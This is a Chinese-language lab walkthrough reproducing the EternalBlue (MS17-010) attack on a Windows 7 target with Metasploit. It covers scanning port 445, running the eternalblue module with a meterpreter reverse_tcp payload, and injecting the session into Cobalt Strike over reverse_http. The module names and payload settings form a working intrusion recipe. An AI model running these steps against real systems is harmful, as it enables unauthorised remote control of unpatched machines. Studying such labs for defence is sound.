一、复现环境
kali攻击机ip:192.168.10.130
靶机windows7x64,关闭防火墙,ip:192.168.10.133
说明:这里靶机需要注意一下需要64位,之前使用xp32位做的没有成功
二、复现过程
打开kali自带的MSF
msfconsole
扫描一下靶机开放的端口
可以看到开放了445端口,永恒之蓝就是利用了445端口
搜索一下ms17-010漏洞
search ms17-010
exploit为攻击模块,auxiliary为辅助扫描模块
先用auxiliary辅助扫描看一下是否存在永恒之蓝漏洞,如果有再去使用攻击模块攻击
use auxiliary/scanner/smb/smb_ms17_010
可以看到已经进入模块下
options命令可以查看需要配置的参数
Required下面的yes对应的是必填的 选项
RHOST为靶机IP地址
RPORT为要攻击的端口,这里默认445,不需要配置
接下来就要配置参数了
可以看到极大可能存在MS17-010漏洞,并猜测了靶机对应的版本
进入攻击模块
use exploit/windows/smb/ms17_010_eternalblue
会显示没有payload,但它默认给你添加上了
以防万一我们再添加一边payload熟悉一下操作
set payload windows/x64/meterpreter/reverse_tcp
利用show payloads命令可以查看当下漏洞利用模块下可用的所有payload
进行攻击
攻击成功后建立了session
background 退回模块下
sessions -i 查看会话信息
session的id号为2
三、会话转移
打开CobaltStrike设置监听
use exploit/windows/local/payload_inject
使用该模块可以将 Metasploit 获取到的会话注入到CS中。
配置payload
set payload windows/meterpreter/reverse_http
配置端口,端口为CobaltStrike自己设置监听的端口
运行
这时CS中会出现转移的会话
参考文章:永恒之蓝漏洞复现(ms17-010)_flyhite的博客-CSDN博客_ms17-010
,